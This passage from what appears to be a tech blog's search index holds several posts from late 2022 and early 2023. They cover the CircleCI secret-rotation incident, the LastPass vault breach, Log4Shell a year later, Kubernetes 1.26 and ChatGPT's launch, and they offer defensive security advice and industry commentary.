2023","externalUrl":null,"permalink":"/posts/230112-tech-layoffs-wave-2023/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Amazon, Salesforce, and others announce massive layoffs to start 2023. Looking at what’s driving this wave and what it means for software engineers.","title":"The 2023 Tech Layoff Wave — What It Means for the Industry","type":"posts"},{"content":"Happy New Year — now go rotate all your secrets. That\u0026rsquo;s the gist of the urgent notice CircleCI published yesterday, January 4th, advising all customers to immediately rotate any and all secrets stored in CircleCI. That includes environment variables, project-level API keys, and anything referenced in your pipeline configurations. This follows a pattern we\u0026rsquo;ve seen repeatedly where build and deployment infrastructure becomes a high-value attack surface.\nWhen a CI/CD platform tells you to rotate everything with that kind of urgency, without yet providing details on scope or impact, it\u0026rsquo;s time to take it seriously. And it raises some uncomfortable questions about how much trust we place in our build infrastructure.\nWhat We Know So Far # The details are sparse at this point. CircleCI\u0026rsquo;s advisory says they\u0026rsquo;re \u0026ldquo;currently investigating\u0026rdquo; a security incident and that out of \u0026ldquo;an abundance of caution\u0026rdquo; customers should rotate all secrets. They\u0026rsquo;ve also recommended reviewing internal logs for unauthorized access from December 21, 2022 through January 4, 2023.\nThat two-week window is concerning. It suggests that whatever happened may have given attackers access to customer data for an extended period. CircleCI is one of the most widely used CI/CD platforms in the industry — their customer base includes startups and enterprises alike. The potential blast radius is significant.\nOAuth tokens are another area of concern. If you\u0026rsquo;ve connected CircleCI to GitHub, Bitbucket, or other services via OAuth, those tokens could potentially have been exposed. CircleCI has stated they\u0026rsquo;ve already rotated Project API tokens and are working on additional mitigations.\nThe CI/CD Trust Problem # This incident highlights something I\u0026rsquo;ve been thinking about for years: CI/CD systems are some of the most privileged components in our infrastructure, yet they often receive less security scrutiny than production systems. The trend toward integrated CI/CD platforms like GitHub Actions concentrates this risk even further, making secure architecture even more critical.\nThink about what your CI/CD platform has access to:\nSource code for every project in your organization Deployment credentials for production environments API keys for third-party services Package registry tokens for publishing Cloud provider credentials for infrastructure provisioning Database connection strings for migrations and testing Your CI/CD platform is, in many ways, a skeleton key to your entire operation. If an attacker compromises it, they potentially have access to everything: your code, your infrastructure, your secrets, and your deployment pipeline. They could inject malicious code that gets deployed automatically through your trusted pipeline.\nThis isn\u0026rsquo;t a new concern. The SolarWinds attack demonstrated the devastating potential of compromised build systems in 2020. The Codecov bash uploader incident in 2021 showed how a single compromised CI component could exfiltrate secrets from thousands of organizations. And now CircleCI joins the list.\nPractical Response Steps # If your team uses CircleCI, here\u0026rsquo;s a prioritized action plan:\nImmediate (today):\nRotate all environment variables and secrets stored in CircleCI Rotate any OAuth tokens connected to CircleCI Review and rotate deployment credentials that CircleCI had access to Audit your CircleCI pipeline configs for any hardcoded secrets (you shouldn\u0026rsquo;t have any, but check) Short-term (this week):\nReview access logs for all systems that CircleCI had credentials for, looking for unusual activity since December 21 Check for any unexpected deployments or package publications during that window Review GitHub/Bitbucket audit logs for repository access patterns Consider whether any secrets that were exposed need further downstream rotation (e.g., if a database password was in CircleCI, rotate it and check for unauthorized access to that database) Medium-term:\nEvaluate your secrets management strategy — are you using a dedicated vault (HashiCorp Vault, AWS Secrets Manager) with short-lived credentials, or are you storing long-lived secrets directly in CI? Implement credential rotation automation so future incidents like this aren\u0026rsquo;t a manual fire drill Review whether you can reduce the privileges your CI/CD platform holds Rethinking CI/CD Security Architecture # This is a good moment to step back and think about how we architect CI/CD security. The traditional model — store secrets in the CI platform and reference them in pipeline configs — is convenient but creates exactly this kind of concentrated risk.\nBetter approaches exist:\nShort-lived credentials: Instead of storing permanent AWS access keys in CircleCI, use OIDC federation to get temporary credentials for each build. The credentials expire automatically, so even if they\u0026rsquo;re exfiltrated, the window of exposure is minutes rather than months.\nSecrets vaults with dynamic secrets: Tools like HashiCorp Vault can generate unique, short-lived credentials for each CI run. Even if an attacker captures them, they expire quickly and can be traced to specific builds.\nLeast privilege: Does your CI pipeline really need admin access to your AWS account? In many organizations, CI credentials are far more permissive than necessary. Tighten those IAM policies.\nBuild provenance and verification: SLSA (Supply-chain Levels for Software Artifacts) provides a framework for ensuring that software artifacts haven\u0026rsquo;t been tampered with during the build process. It\u0026rsquo;s still maturing, but the concepts are sound.\nMy Take # Every few months, we get another reminder that the software supply chain is a critical attack surface. SolarWinds, Codecov, the npm and PyPI package poisoning campaigns, and now CircleCI. The pattern is clear, and yet many organizations still treat CI/CD security as an afterthought.\nI\u0026rsquo;m not going to tell anyone to stop using CircleCI — breaches can happen to any platform, and what matters more is how they respond and what systemic changes they make. But I am going to say this: if your organization\u0026rsquo;s response to this incident is simply \u0026ldquo;rotate secrets and move on,\u0026rdquo; you\u0026rsquo;re missing the larger lesson.\nThe question isn\u0026rsquo;t \u0026ldquo;is CircleCI secure?\u0026rdquo; It\u0026rsquo;s \u0026ldquo;how much damage can any single compromised component do to our systems?\u0026rdquo; If the answer is \u0026ldquo;a lot,\u0026rdquo; that\u0026rsquo;s an architecture problem, not a vendor problem. Start minimizing that blast radius now, before the next incident gives you another urgent reason to.\n","date":"5 January 2023","externalUrl":null,"permalink":"/posts/230105-circleci-security-incident/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"CircleCI discloses a security incident and urges all customers to immediately rotate secrets stored in the platform. A reminder of the risks in our CI/CD supply chain.","title":"CircleCI's Security Incident — Rotate Your Secrets Now","type":"posts"},{"content":"It\u0026rsquo;s been roughly a month since OpenAI released ChatGPT, and I don\u0026rsquo;t think I\u0026rsquo;ve seen anything move this fast in the tech world since the early iPhone days. The numbers being reported are staggering — over a million users in the first five days. My LinkedIn feed, my team\u0026rsquo;s Slack channels, even conversations at family dinners over the holidays have been dominated by one question: \u0026ldquo;Have you tried ChatGPT?\u0026rdquo;\nI\u0026rsquo;ve been working in software for three decades now. I\u0026rsquo;ve seen plenty of \u0026ldquo;this changes everything\u0026rdquo; moments that turned out to be incremental improvements with good marketing. But this one feels qualitatively different, and I want to unpack why.\nThe Interface Breakthrough # The underlying technology — large language models, transformer architecture, reinforcement learning from human feedback (RLHF) — has been developing for years. GPT-3 launched in 2020. GitHub Copilot has been available since 2021. So why is ChatGPT the one that\u0026rsquo;s captured the public imagination?\nThe answer, I think, is the interface. OpenAI made a brilliant product decision by wrapping their model in a simple chat interface with no API keys, no setup, no technical prerequisites. You go to a website, type a question, and get an answer. The barrier to entry is essentially zero. This accessibility would prove foundational to how modern AI assistants like Claude eventually reached broader audiences.\nThis matters enormously. GPT-3 was arguably more flexible, but you needed to understand prompting, work with an API, or use a playground that felt like a developer tool. ChatGPT feels like talking to someone knowledgeable. That conversational framing — the way it maintains context across a conversation, admits when it\u0026rsquo;s wrong, and asks clarifying questions — makes it accessible to anyone.\nWhat It\u0026rsquo;s Good At (And What It\u0026rsquo;s Not) # I\u0026rsquo;ve been experimenting with ChatGPT extensively over the past few weeks, particularly for development tasks. Here\u0026rsquo;s where I see genuine utility:\nCode explanation and debugging: Paste in a confusing piece of code, ask what it does, and you\u0026rsquo;ll get a surprisingly coherent explanation. I\u0026rsquo;ve found it particularly useful for understanding unfamiliar codebases or libraries.\nBoilerplate generation: Need a basic Express.js server setup, a Docker Compose file, or a GitHub Actions workflow? ChatGPT can generate reasonable starting points. It won\u0026rsquo;t replace understanding what the code does, but it can save you the tedious scaffolding work.\nWriting documentation: First drafts of READMEs, API docs, and code comments. It needs editing, but the raw output is often a solid starting point.\nWhere it falls short is equally important to understand:\nAccuracy and hallucination: ChatGPT confidently generates plausible-sounding but incorrect information. It will cite papers that don\u0026rsquo;t exist, reference API methods that were never implemented, and present outdated information as current. You cannot trust its output without verification.\nComplex reasoning: Multi-step logical problems, nuanced architectural decisions, and anything requiring genuine understanding of trade-offs — these are areas where the model\u0026rsquo;s pattern matching breaks down. It can parrot best practices but can\u0026rsquo;t reason about why they\u0026rsquo;re best practices in your specific context.\nCurrent knowledge: The training data has a cutoff, so it doesn\u0026rsquo;t know about recent library versions, new APIs, or current best practices for rapidly evolving tools.\nThe Developer Tooling Implications # What interests me most about ChatGPT is what it signals for developer tooling. GitHub Copilot already showed that LLMs could be useful code completion tools. ChatGPT demonstrates that the conversational interaction model can make AI assistance feel natural and productive.\nI expect 2023 to bring an explosion of AI-powered developer tools. Code review assistants, documentation generators, test case suggestors, architecture advisors — the potential applications are enormous. This evolution continued through GitHub Copilot\u0026rsquo;s agent mode and broader AI-assisted testing implementations. The question isn\u0026rsquo;t whether these tools will exist, but how quickly they\u0026rsquo;ll mature and how well they\u0026rsquo;ll integrate into existing workflows.\nThe teams and companies that figure out how to effectively use these tools will have a real productivity advantage. Not because AI will write their code for them, but because it will handle the routine work that consumes so much of a developer\u0026rsquo;s day — the boilerplate, the documentation, the \u0026ldquo;how do I do X in framework Y\u0026rdquo; searches.\nThe Concerns Are Real # I\u0026rsquo;d be remiss not to mention the legitimate concerns. The potential for AI-generated misinformation is significant. Students are already using ChatGPT to write essays, which raises questions about education and assessment. The copyright implications of models trained on vast amounts of internet text are still being debated and litigated.\nFor developers specifically, there\u0026rsquo;s the question of code quality and security. If teams start accepting AI-generated code without thorough review, we could see a wave of subtle bugs and vulnerabilities introduced at scale. The code ChatGPT generates works in isolation but doesn\u0026rsquo;t always account for edge cases, error handling, or security implications.\nThere\u0026rsquo;s also the competitive landscape to consider. OpenAI has a significant head start, but Google, Meta, and others have their own large language models. How this market evolves — and whether it consolidates or fragments — will shape the tools available to us.\nMy Take # I\u0026rsquo;ll be honest: I\u0026rsquo;m cautiously optimistic about where this is heading. ChatGPT isn\u0026rsquo;t going to replace developers — the model doesn\u0026rsquo;t understand software engineering, it generates text that looks like software engineering. But as an augmentation tool, as a way to accelerate the mundane parts of our work, it has genuine potential.\nWhat I\u0026rsquo;d recommend to every developer: spend time with ChatGPT now. Understand its capabilities and limitations firsthand. The journey from simple chat to sophisticated AI coding assistants shows how quickly these tools matured. Don\u0026rsquo;t wait for the polished tools that will inevitably follow — build your intuition for what these models can and can\u0026rsquo;t do. That intuition will be valuable regardless of which specific tools win in the market.\nWe\u0026rsquo;re at the beginning of something significant. Not the end of programming, but possibly the beginning of a new era in how we interact with computers and build software. The emergence of agent-based systems represents this evolution. The next few months are going to be fascinating to watch.\n","date":"29 December 2022","externalUrl":null,"permalink":"/posts/221229-chatgpt-explosive-first-month/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"One month after launch, ChatGPT has crossed a million users and sparked conversations about AI that reach far beyond the usual tech circles. Here’s why this one matters.","title":"ChatGPT's First Month — Why This AI Moment Feels Different","type":"posts"},{"content":"Just before the holidays, LastPass dropped what might be the most devastating breach disclosure of the year. In an updated blog post, the company revealed that the August 2022 breach was far worse than initially reported: attackers obtained copies of customer vault data, including encrypted password vaults and unencrypted metadata like website URLs.\nFor a company whose entire value proposition is \u0026ldquo;we keep your passwords safe,\u0026rdquo; this is about as bad as it gets. And the way this disclosure has been drip-fed over months makes it even more concerning.\nThe Anatomy of a Cascading Breach # Let\u0026rsquo;s piece together what happened. Back in August, LastPass disclosed that an unauthorized party gained access to their development environment through a compromised developer account. At the time, they assured users that no customer data or encrypted vaults were accessed.\nThen in November, they updated the disclosure: the attacker had used information stolen from the development environment to target an employee and obtain credentials to access cloud storage. Now, in December, we learn the full picture — the attacker copied customer vault backup data from that cloud storage.\nThis is a textbook example of lateral movement. The attacker didn\u0026rsquo;t need to breach the production vault infrastructure directly. Similar supply chain security breaches have revealed how development environment access can cascade into severe compromises. They found a path through the development environment, pivoted to cloud storage credentials, and walked away with the crown jewels. It\u0026rsquo;s the kind of attack chain that security teams model in threat assessments but hope never materializes.\nWhat\u0026rsquo;s Actually at Risk # LastPass is emphasizing that the vault data is encrypted with AES-256 and can only be decrypted with the user\u0026rsquo;s master password. Technically, that\u0026rsquo;s true. But there are several problems with treating this as reassurance.\nFirst, not everything in the vault is encrypted. Website URLs, for instance, are stored as unencrypted metadata. This means attackers can see which services you use — your bank, your email provider, your employer\u0026rsquo;s VPN. That\u0026rsquo;s valuable intelligence for targeted phishing.\nSecond, the security of the encrypted data depends entirely on the strength of the master password. Users who chose weak master passwords — and there are inevitably many — face a real risk of brute-force attacks. LastPass has improved their default PBKDF2 iteration count over the years, but older accounts that haven\u0026rsquo;t updated their settings may be using far fewer iterations, making offline cracking significantly faster.\nThird, this data doesn\u0026rsquo;t expire. Unlike a stolen session token or even a leaked credit card number, an encrypted vault backup is a time bomb. Attackers can hold onto it and crack it over months or years as compute costs decrease.\nThe Trust Problem # I\u0026rsquo;ve been in this industry long enough to know that breaches happen. Every company of sufficient size will eventually face one. What matters is how you handle it, how your architecture limits blast radius, and how transparent you are with affected users.\nLastPass has struggled on all three counts. The August-to-December drip-feed of increasingly bad news erodes trust more than a single comprehensive disclosure would have. The architecture question — why were vault backups accessible through a path that started with a developer account — is one that will take time to fully answer. Later zero-day supply chain incidents would highlight continued challenges in securing development infrastructure. And the communication, while technically accurate, has consistently downplayed severity.\nFor those of us who advocate for password managers (and I still do — they\u0026rsquo;re better than the alternative for most people), this is a painful moment. The security community has spent years convincing non-technical users that password managers are worth trusting. One incident like this can undo a lot of that work.\nWhat Should Affected Users Do # If you\u0026rsquo;re a LastPass user, here\u0026rsquo;s the pragmatic advice:\nChange your master password immediately, and make it long and unique. A passphrase of 4-5 random words is ideal. Assume the unencrypted metadata is known. Be extra vigilant about phishing attempts that reference specific services you use. Prioritize rotating passwords for your most sensitive accounts — banking, email, anything that could be used for further account recovery. Enable MFA everywhere you haven\u0026rsquo;t already. Even if a password is cracked, MFA provides a second barrier. Consider migrating to another password manager. Not because all alternatives are inherently more secure, but because the trust relationship with LastPass is damaged. My Take # The LastPass situation is a stark reminder that security isn\u0026rsquo;t just about encryption algorithms — it\u0026rsquo;s about the entire system: architecture, access controls, monitoring, incident response, and communication. AES-256 is practically unbreakable, but that doesn\u0026rsquo;t matter if the system around it has exploitable paths.\nFor teams building cloud services, the lesson is clear: treat your development and staging environments with nearly the same rigor as production. The importance of comprehensive security responses to threats across all layers cannot be overstated. The attack surface isn\u0026rsquo;t just your front door — it\u0026rsquo;s every side entrance, back window, and connected garage. Assume that a breach of any environment could be a stepping stone to your most sensitive data, and architect accordingly.\nThis is going to be one of the defining security stories of 2022, and its ramifications will play out well into next year. Keep an eye on the technical post-mortems as they emerge — there will be valuable lessons for all of us building and operating cloud services.\n","date":"22 December 2022","externalUrl":null,"permalink":"/posts/221222-lastpass-breach-vault-data/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"LastPass reveals attackers obtained copies of customer vault data, turning an already serious breach into one of the worst password manager incidents in history.","title":"LastPass Breach Goes From Bad to Catastrophic — Customer Vaults Compromised","type":"posts"},{"content":"It\u0026rsquo;s been almost exactly one year since CVE-2021-44228 — better known as Log4Shell — turned the software industry upside down. On December 9, 2021, a critical remote code execution vulnerability in Apache Log4j 2, one of the most ubiquitous Java logging libraries in existence, sent every operations team scrambling. Entire weekends were consumed by frantic dependency scanning, emergency patching, and the uncomfortable realization that most organizations couldn\u0026rsquo;t even answer the basic question: \u0026ldquo;Do we use Log4j?\u0026rdquo;\nNow, a year later, it\u0026rsquo;s worth asking: what actually changed? Did the industry learn its lessons, or was Log4Shell just another crisis that generated momentary urgency before fading into background noise? The pattern emerged clearly with SolarWinds, Codecov, and subsequent incidents.\nThe State of Log4j Patching # Let\u0026rsquo;s start with the uncomfortable reality: Log4Shell isn\u0026rsquo;t fully remediated across the industry. According to data from Sonatype\u0026rsquo;s Maven Central repository statistics, a significant percentage of Log4j downloads are still for vulnerable versions. Some of this is build systems pulling cached artifacts, but some represents genuine continued use of unpatched versions.\nThe long tail of vulnerability remediation in open-source dependencies is a well-known problem, but Log4Shell made it visceral. Transitive dependencies — where your application doesn\u0026rsquo;t directly use Log4j but includes a library that includes a library that does — meant that many teams spent days just understanding their exposure. This pattern of hidden dependencies enabling attacks had already cost organizations significantly. Traditional vulnerability scanners that only check direct dependencies missed deeply nested transitive inclusions.\nThis experience directly accelerated adoption of Software Bills of Materials (SBOMs). The concept predates Log4Shell, but the crisis created the urgency. The U.S. Executive Order 14028 on cybersecurity, issued in May 2021, already mandated SBOMs for software sold to the federal government. Log4Shell provided the case study for why.\nThe SBOM Progress Report # Tools for generating and consuming SBOMs have proliferated over the past year. Syft from Anchore, Trivy from Aqua Security, and the SPDX and CycloneDX standards have all seen significant adoption growth. GitHub\u0026rsquo;s dependency graph and Dependabot, GitLab\u0026rsquo;s dependency scanning, and various CI/CD integrations now make it far easier to generate SBOMs as part of your build pipeline.\nBut generating an SBOM and actually using it for security operations are different things. Many organizations can now produce a JSON file listing their dependencies. Fewer have operationalized that data into workflows that automatically flag when a dependency in their SBOM has a new CVE, correlate that with deployment information to assess blast radius, and prioritize remediation based on actual exposure rather than CVSS scores alone.\nThe tooling is improving, but the operational maturity gap is real. We\u0026rsquo;ve solved the \u0026ldquo;generate the SBOM\u0026rdquo; problem; the \u0026ldquo;act on the SBOM effectively\u0026rdquo; problem remains open.\nSupply Chain Security Beyond SBOMs # Log4Shell also accelerated investment in broader supply chain security initiatives.\nSigstore, which reached general availability in October, provides free code signing for open-source projects. The idea is simple: if you can verify that a package was built from a specific source commit by a specific maintainer, you reduce the risk of tampering. Sigstore\u0026rsquo;s keyless signing approach, using short-lived certificates tied to OIDC identities, removes the historical barrier of key management that prevented widespread adoption of package signing.\nThe OpenSSF Scorecard project assigns security health metrics to open-source projects. It checks for things like branch protection, CI/CD pipeline security, dependency update practices, and signed releases. It\u0026rsquo;s becoming common to see Scorecard badges on GitHub repositories, and some organizations are starting to incorporate Scorecard data into their dependency approval processes.\nGoogle\u0026rsquo;s SLSA framework (Supply-chain Levels for Software Artifacts) provides a maturity model for supply chain security, from basic source and build provenance to hermetic, reproducible builds. Adoption is still early, but the framework gives organizations a vocabulary and roadmap for improving their supply chain security posture incrementally.\nWhat Hasn\u0026rsquo;t Changed Enough # Despite genuine progress, several fundamental problems remain.\nMaintainer sustainability is still precarious. Log4j is maintained by a small group of volunteers. The vulnerability response burned out already-stretched maintainers. Initiatives like the Alpha-Omega Project from the OpenSSF are directing funding to critical open-source projects, but the broader problem of funding the infrastructure everyone depends on remains unsolved. The OpenSSL vulnerability response showed both progress and the same underlying sustainability challenges.\nTransitive dependency management is still primitive in most ecosystems. JavaScript\u0026rsquo;s npm audit flags hundreds of advisories, most of which are in deep transitive dependencies that applications never actually invoke the vulnerable code path of. The noise-to-signal ratio discourages developers from engaging with the results, which is exactly the wrong outcome.\nVulnerability detection timing hasn\u0026rsquo;t fundamentally improved. Zero-day vulnerabilities in widely-used libraries still create fire drills. The time from vulnerability disclosure to widespread exploitation continues to shrink, while the time to patch — especially for organizations with complex deployment pipelines — hasn\u0026rsquo;t meaningfully decreased.\nMy Take # One year on, I\u0026rsquo;d give the industry a B-minus. Genuine progress has been made in tooling, standards, and awareness. SBOMs are becoming a real practice rather than a compliance checkbox. Sigstore and SLSA are building the infrastructure for verifiable supply chains. Organizations that couldn\u0026rsquo;t answer \u0026ldquo;do we use Log4j?\u0026rdquo; in December 2021 can now answer that question for most of their dependencies.\nBut the structural problems — underfunded maintainers, noisy vulnerability scanning, the economics of open-source security — are harder to solve than the tooling problems. We\u0026rsquo;ve built better smoke detectors. We haven\u0026rsquo;t addressed why buildings keep catching fire.\nIf your organization hasn\u0026rsquo;t adopted SBOM generation, dependency scanning in CI/CD, and a process for responding to critical dependency vulnerabilities, the anniversary of Log4Shell is a good moment to start. The lessons apply to the entire software supply chain from open-source components to deployed systems. The next Log4Shell is a matter of when, not if. The question is whether you\u0026rsquo;ll be scrambling again or prepared this time.\n","date":"15 December 2022","externalUrl":null,"permalink":"/posts/221215-log4shell-one-year-later/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"A year after Log4Shell shook the software industry, we examine what’s improved in supply chain security — and what still keeps us up at night.","title":"One Year After Log4Shell — What Actually Changed?","type":"posts"},{"content":"Kubernetes 1.26, codenamed \u0026ldquo;Electrifying,\u0026rdquo; dropped yesterday, and while it\u0026rsquo;s not the kind of release that generates breathless headlines, it\u0026rsquo;s packed with meaningful improvements for teams running production clusters. After three releases per year for several years now, the Kubernetes project has found a rhythm of steady, incremental progress — which is exactly what you want from infrastructure software.\nI\u0026rsquo;ve been running Kubernetes in production since the 1.9 days, and what strikes me about recent releases isn\u0026rsquo;t any single feature but the maturity of the project\u0026rsquo;s priorities: better defaults, improved stability, and cleaning up technical debt. Let\u0026rsquo;s look at what matters in 1.26.\nCEL for Admission Control: A Big Deal # The feature I\u0026rsquo;m most excited about is the graduation of Common Expression Language (CEL) for admission webhooks to beta. If you\u0026rsquo;ve managed Kubernetes at scale, you know that admission webhooks are simultaneously essential and operationally painful. Every mutating or validating webhook adds latency to the API server and introduces a dependency that can bring cluster operations to a halt if the webhook service is unavailable.\nCEL-based validation admission policies let you express validation rules directly in the API server without deploying external webhook services. This in-cluster validation pattern continues to evolve in later Kubernetes releases. Instead of running an OPA Gatekeeper pod or a custom webhook deployment, you can write validation logic as CEL expressions in a ValidatingAdmissionPolicy resource.\nFor example, enforcing that all Deployments have resource limits set, which previously required either a webhook or a policy engine, can now be expressed as a CEL expression evaluated in-process by the API server. No external dependencies, no additional latency, no availability concerns.\nThis doesn\u0026rsquo;t replace OPA or Kyverno for complex policy scenarios — CEL expressions are intentionally limited in scope. Container security practices continue to build on these foundational policy mechanisms. But for the 80% of admission policies that are straightforward validation checks, this is a meaningful simplification of the operational model.\nStorage Improvements # Kubernetes storage continues to mature with several notable changes in 1.26.\nCross-namespace volume data sources moves to alpha, allowing PersistentVolumeClaims to reference data sources in different namespaces. This addresses a real workflow limitation — for example, creating a development PVC from a production snapshot without copying the snapshot to the development namespace first.\nThe CSI driver migration project continues its march toward completion. In 1.26, the in-tree Azure Disk and Azure File drivers are marked for migration to their CSI equivalents. If you\u0026rsquo;re running on Azure, you should be planning your migration if you haven\u0026rsquo;t already. The in-tree storage drivers have been deprecated for a while, and each release moves closer to their removal.\nRetroactive default StorageClass assignment graduates to beta. Previously, if you created a PVC without specifying a StorageClass and no default was set, the PVC would remain unbound even after you later designated a default StorageClass. Now, the system retroactively assigns the default StorageClass to unbound PVCs. It\u0026rsquo;s a small quality-of-life improvement that eliminates a confusing failure mode.\nCleaning House: Removals and Deprecations # Every Kubernetes release removes deprecated features, and 1.26 has several notable ones.\nThe CRI v1alpha2 API is removed, meaning container runtimes must implement CRI v1. This shouldn\u0026rsquo;t affect anyone on recent versions of containerd or CRI-O, but if you\u0026rsquo;re running older runtime versions, this is your forcing function to upgrade.\nThe deprecated in-tree FlowSchema and PriorityLevelConfiguration API versions are removed. The dynamic kubelet configuration feature gate is removed entirely. And several beta APIs that have been superseded by GA equivalents are cleaned up.\nI appreciate this housekeeping, even though it sometimes causes upgrade friction. The Kubernetes platform maturity journey demonstrates how consistent cleanup enables long-term stability. A project the size of Kubernetes can\u0026rsquo;t afford to accumulate legacy APIs indefinitely. Every deprecated API that lingers is a maintenance burden and a source of confusion for newcomers trying to understand which approach is current.\nScheduling Enhancements # The scheduler sees some useful improvements. PodSchedulingReadiness graduates to alpha, introducing a .spec.schedulingGates field that lets external controllers prevent pods from being scheduled until certain conditions are met. The use cases include batch scheduling systems that want to ensure all pods in a job can be placed before any of them start, or quota systems that need to approve resource consumption before scheduling proceeds.\nNodeInclusionPolicies for topology spread constraints give you finer control over which nodes are considered when calculating topology spread. You can now exclude tainted nodes from the spread calculation, which is a common request for clusters with mixed node types.\nUpgrade Considerations # If you\u0026rsquo;re planning your 1.26 upgrade, a few things to watch for:\nThe deprecation of several beta APIs means you should run kubectl deprecations (or your cluster management tool\u0026rsquo;s equivalent) before upgrading. Manifests referencing removed APIs will fail to apply after the upgrade.\nThe CRI v1alpha2 removal means your container runtime must be reasonably current. Containerd 1.6+ and CRI-O 1.24+ implement CRI v1.\nAs always, test the upgrade in a staging environment first. The release notes are comprehensive and worth reading in full.\nMy Take # Kubernetes 1.26 is a \u0026ldquo;good infrastructure release\u0026rdquo; — it improves the platform\u0026rsquo;s operational characteristics without introducing unnecessary complexity. CEL-based admission policies alone justify attention, as they address one of the most common sources of cluster operational issues.\nThe project\u0026rsquo;s discipline around deprecation and removal is commendable. It\u0026rsquo;s tempting for open-source projects to keep deprecated features forever to avoid breaking users, but that path leads to unmaintainable software. The Kubernetes deprecation policy — clear timelines, multiple release warnings, and tooling to detect usage — is a model other projects should study.\nIf you\u0026rsquo;re running Kubernetes in production, plan your 1.26 upgrade for early next year. If you\u0026rsquo;re evaluating Kubernetes, the CEL admission policies and improved storage story make the operational model meaningfully more approachable than it was even a year ago.\n","date":"8 December 2022","externalUrl":null,"permalink":"/posts/221208-kubernetes-126-electrifying/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Kubernetes 1.26 ‘Electrifying’ arrives with significant improvements to storage, scheduling, and the ongoing effort to remove legacy code.","title":"Kubernetes 1.26 — Electrifying the Platform","type":"posts"},{"content":"Yesterday, OpenAI quietly released ChatGPT, a conversational AI model, and within hours my entire timeline — across every platform — was nothing but screenshots of people testing it. By this morning, it feels like every developer I know has tried it, and the reactions range from \u0026ldquo;this changes everything\u0026rdquo; to genuine existential dread.\nI spent a few hours with it last night, and I\u0026rsquo;ll be honest: it\u0026rsquo;s the most impressive AI demo I\u0026rsquo;ve ever interacted with. But I\u0026rsquo;ve been in this industry long enough to know that impressive demos and production-ready tools are very different things. Let\u0026rsquo;s dig into what\u0026rsquo;s actually happening here.\nWhat ChatGPT Actually Is # ChatGPT is built on GPT-3.5, fine-tuned using Reinforcement Learning from Human Feedback (RLHF). The key innovation isn\u0026rsquo;t the base model — GPT-3 has been available via API for over two years — but the conversational fine-tuning. Previous GPT-3 interactions required careful prompt engineering to get useful outputs. ChatGPT understands conversational context, follows instructions more reliably, and produces structured responses without elaborate prompting.\nThe RLHF approach is significant. Human trainers ranked model outputs by quality, and these rankings were used to train a reward model, which then guided further fine-tuning via proximal policy optimization. Later developments with Claude and context learning would build on these foundational techniques. The result is a model that\u0026rsquo;s better at following the intent behind a question rather than just pattern-matching on the words.\nFrom a technical perspective, this is an elegant demonstration of alignment techniques. The model actively refuses harmful requests, asks clarifying questions, and admits uncertainty. It\u0026rsquo;s not perfect at any of these — I\u0026rsquo;ve seen plenty of confident-sounding incorrect answers — but the improvement over raw GPT-3 is substantial.\nThe Coding Implications # As a developer, the coding capabilities are what caught my attention most. This would eventually evolve into dedicated AI coding assistants and Copilot agent mode. I tested it across several scenarios:\nExplaining code: I pasted in a complex regex and asked for an explanation. It broke it down component by component, accurately. I tried the same with a tricky SQL query involving window functions. Again, solid explanation.\nGenerating code: I asked for a Python function to parse a specific log format. The first output was functional and reasonably idiomatic. When I asked it to add error handling, it modified the code appropriately. When I pointed out an edge case it missed, it corrected it.\nDebugging: I pasted in a function with a subtle off-by-one error and asked it to find bugs. It identified the issue and explained why it was wrong.\nNone of this is magic — the model has been trained on vast amounts of code and programming discussion. But the conversational interface makes it dramatically more accessible than previous code-generation tools. You don\u0026rsquo;t need to craft perfect prompts; you can iterate naturally.\nWhere It Falls Down # The failure modes are important to understand. ChatGPT generates plausible-sounding text, but it has no mechanism for verifying factual accuracy. I asked it several questions about specific library APIs and got confidently stated answers that were subtly wrong — the function signatures looked right but had incorrect parameter names or return types.\nThis is the fundamental challenge with large language models for technical work: they optimize for coherence, not correctness. A senior developer will catch these errors. A junior developer might not. And that\u0026rsquo;s a real concern as these tools become more accessible.\nI also noticed the model struggles with temporal knowledge boundaries. It sometimes references features or versions that don\u0026rsquo;t exist yet, or conflates information from different time periods. The training data cutoff creates a knowledge horizon that the model doesn\u0026rsquo;t always respect gracefully.\nThe \u0026ldquo;What Happens to Stack Overflow\u0026rdquo; Question # The immediate reaction in many communities has been to question whether ChatGPT will replace Stack Overflow, developer documentation, or even developers themselves. Let me push back on the more dramatic predictions.\nStack Overflow\u0026rsquo;s value isn\u0026rsquo;t just answers — it\u0026rsquo;s verified, community-vetted, version-specific answers with context about why alternatives don\u0026rsquo;t work. The complementary roles of AI systems and human expertise continue to be refined. ChatGPT gives you an answer; Stack Overflow gives you an answer that a thousand developers have validated.\nThat said, for the initial \u0026ldquo;how do I approach this\u0026rdquo; phase of problem-solving, ChatGPT is remarkably effective. It\u0026rsquo;s like having a knowledgeable colleague available 24/7 who can get you 80% of the way there. The last 20% — verification, edge cases, production considerations — still requires human expertise.\nThe Infrastructure Question # One aspect that hasn\u0026rsquo;t gotten enough attention: the compute costs of running this at scale. Each conversation requires significant GPU resources for inference. OpenAI is currently offering this for free during a \u0026ldquo;research preview,\u0026rdquo; but the cost of serving millions of concurrent conversations with a model this size is non-trivial.\nThe economics of large language model inference are going to be a major infrastructure challenge going forward. This challenge shaped infrastructure decisions for AI workloads. Model serving at this scale requires specialized hardware, aggressive optimization (quantization, distillation, batching strategies), and potentially new architectural approaches.\nMy Take # ChatGPT is the most compelling AI product I\u0026rsquo;ve used. Full stop. The conversational interface, the quality of responses, and the breadth of capability represent a genuine step function in what\u0026rsquo;s accessible to developers and non-developers alike.\nBut I want to be measured here. I\u0026rsquo;ve seen enough hype cycles to know that the gap between \u0026ldquo;amazing demo\u0026rdquo; and \u0026ldquo;reliable production tool\u0026rdquo; is where most technologies stall. The question isn\u0026rsquo;t whether ChatGPT is impressive — it clearly is. The question is how quickly the rough edges get smoothed, how the economics work at scale, and whether the accuracy problems can be addressed.\nFor now, I\u0026rsquo;m treating it as a powerful drafting tool — great for generating first attempts, exploring approaches, and explaining unfamiliar code. But I\u0026rsquo;m verifying everything it produces, just as I would with code from any source I don\u0026rsquo;t fully trust.\nThe developer workflow is about to change. How much, and how fast, remains to be seen.\n","date":"1 December 